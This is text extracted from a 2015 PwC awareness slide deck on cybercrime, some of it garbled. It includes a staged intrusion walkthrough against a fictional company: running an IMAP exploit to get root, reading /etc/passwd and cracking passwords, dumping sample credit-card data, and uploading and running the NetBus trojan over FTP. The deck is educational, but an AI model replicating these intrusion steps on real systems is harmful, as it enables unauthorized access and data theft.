11/9/2015

1

Cybersecurity & Cybercrime

Mick CoadyPartnerCybersecurity & Privacy

PwC 2

11/9/2015

2

A Total Novice Can be a Hacker TodayAttack Sophistication vs. Intruder Technical Knowledge

High

Cross site scripting Tools“stealth” / advanced 

i t h i

Auto  Coordinated

High

IntruderKnowledge

disabling audits

back doors

hijacking 

sweepers

sniffers

packet spoofing

GUIautomated probes/scans

denial of service

www attacks

scanning techniques

network mgmt. diagnostics

distributedattack tools

Staged

IntrudersLow

1980 1985 1990 1995 2000

AttackSophistication

password guessing

self‐replicating code

password cracking

exploiting known vulnerabilities

j gsessionsburglaries

3

Common threats

Threats

• Hackers – “Script Kiddies”

• Employees – former and disgruntled

• Domestic Competitors – “Competitive Intelligence”

• State Sponsored & Corporate Espionage

PwC

• Extremists – Earth Liberation Front (ELF)

11/9/2015

3

Anatomy of an Attack

PwC

Anatomy of AttackModis Operandi

Physical Penetrations

Company Profiling – Open

Known Exploits

Port Redirection of Packetsp y g pSource Research

Footprinting – Scanning –Enumeration – Penetration -Escalate Privilege –Stealing/Damaging Corp. information

Trojans – remote controlling

Zone Transfers

SNMP Sweeps

Router Exploitation

Key Loggers – Software and Hardware devices

Denial of Service

PwC 6

Trojans remote controlling systems

Buffer Overflows

11/9/2015

4

Anatomy of AttackPhysical Penetrations

ill• Surveillance

• Dumpster Diving

• Impersonation of

Authorized Personnel

PwC 7

PwC 8

11/9/2015

5

PwC 9

Bigwidget.net

PwC 10

11/9/2015

6

Registrant :Big Widget, Inc. (BIGWIDGET_DOM)

1111 Big Widget DriveReally Big, CA 90120 US

Domain Name: BIGWIDGET.NET

Administrative Contact, Technical Contact: Zone Contact, Billing Contact:Simms, Haywood (HS69) Dodge, Rodger (RD32)

hsimms@BIGWIDGET.NET rdodge@BIGWIDGET.NET1111 Big Widget Drive, UMIL04-07 1111 Big Widget Drive, UMIL04-47

Really Big, CA 90210 Really Big, CA 90210678-443-6001 678-443-6014

PwC 11

Record last updated on 24-June-2000Record expires on 20-Mar-2010Record created on 14-Mar-1998

Database last updated on 7-Jun-2000 15:54

Domain servers in listed order:

EHECATL.BIGWIDGET.NET 10.1.1.53NS1-AUTH.SPRINTLINK.NET 206.228.179.10

NS.COMMANDCORP.COM 130.205.70.10

~$ telnet mail.bigwidget.net 25

Trying 10.1.1.10 ...

Connected to mail.bigwidget.net

Escape character is '^]'.

hacker:

C i l d b f i h

hacker:~$

Connection closed by foreign host.

telnet mail.bigwidget.net 143

Trying 10.1.1.10...

Connected to mail.bigwidget.net. * OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998 11:51:50 -0400 (EDT)

(Report problems in this server to MRC@CAC.Washington.EDU)

PwC

. logout

* BYE bigwidget IMAP4rev1 server terminating connection. OK LOGOUT completed

Connection closed by foreign host.

12

11/9/2015

7

PwC13

hacker ~$./imap_exploit mail.bigwidget.com

IMAP Exploit for Linux.Author: Akylonius (aky@galeb.etf.bg.ac.yu)

Modifications: p1 (p1@el8.org)

Completed successfully.

hacker ~$ telnet mail.bigwidget.com

Trying 10.1.1.10...

Connected to mail.bigwidget.com.

Red Hat Linux release 4.2 (Biltmore)Kernel 2.0.35 on an i686

root

bigwidget:~#whoami

root

bigwidget:~# cat ./hosts

bigwidget:~# cd /etc

login:

PwC

127.0.0.1 localhost localhost.localdomain10.1.1.9 thevault medical records

10.1.1.11 fasttalk PACS10.1.1.12 geekspeak engineering

10.1.1.13 people human resources10.1.1.14 thelinks finance

10.1.1.15 thesource information systems

14

11/9/2015

8

Allan B. Smith 6543-2223-1209-4002 12/99Donna D. Smith 6543-4133-0632-4572 06/98Jim Smith 6543-2344-1523-5522 01/01Joseph L.Smith 6543-2356-1882-7532 04/02Kay L. Smith 6543-2398-1972-4532 06/03Mary Ann Smith 6543-8933-1332-4222 05/01Robert F. Smith 6543-0133-5232-3332 05/99

bigwidget:~#

cat visa.txt

cd /data/creditcards

bigwidget:~#

bigwidget:~# crack /etc/passwd

Cracking /etc/passwd...

username: bobman password: nambobusername: jsmith password: redbirdsusername: root password:

bigwidget:~# ftp thesource

Connected to thesource220 th Mi ft FTP S i (V i 4 0)

PwC

220 thesource Microsoft FTP Service (Version 4.0).

Name: jsmith

331 Password required for jsmith.

Password: ********

230 User jsmith logged in.

Remote system type is Windows_NT.

15

PwC16

11/9/2015

9

ftp> cd \temp

250 CDW command successful.

ftp> send netbus.exe

local: netbus.exe remote: netbus.exe

200 PORT command successful.150 Opening BINARY mode data connection for netbus.exe226 Transfer complete.

ftp>

ftp>

quitftp> quit

thevault:~$ telnet thesource

Trying 10.1.1.15... Connected to thesource.bigwidget.com.Escape character is '^]'.

Microsoft (R) Windows 2000

Welcome to MS Telnet ServiceTelnet Server Build 5.00.98217.1

l i

PwC

login:jsmith

password: ********

*===============================================================Welcome to Microsoft Telnet Server.

*===============================================================C:\>cd \temp

C:\TEMP> netbus.exe

17

NetBus 1.6, by cfBi id @bi id t Fi @Bi Wid t

David Smith

Postmaster < postmaster@bigwidget.com >

Bigwidge@bigwidget.com; Finance@BigWidget.com

Greetings < URGENT >

Greetings Bigwidget employees:

I have officially compromised your entire system, and have obtained all of your accounting information.

Yours Truly,

Friendly Hacker

PwC

Connected to the.source.bigwidget.com

Screendump

18

11/9/2015

10

Web

NetBusNetBusimapimap

Anatomy of Attack (Continued)

Router

NetBusNetBus

FTP

imapimap

Firewall

Clients & Workstations

19

Cyber Security

http://map.ipviking.com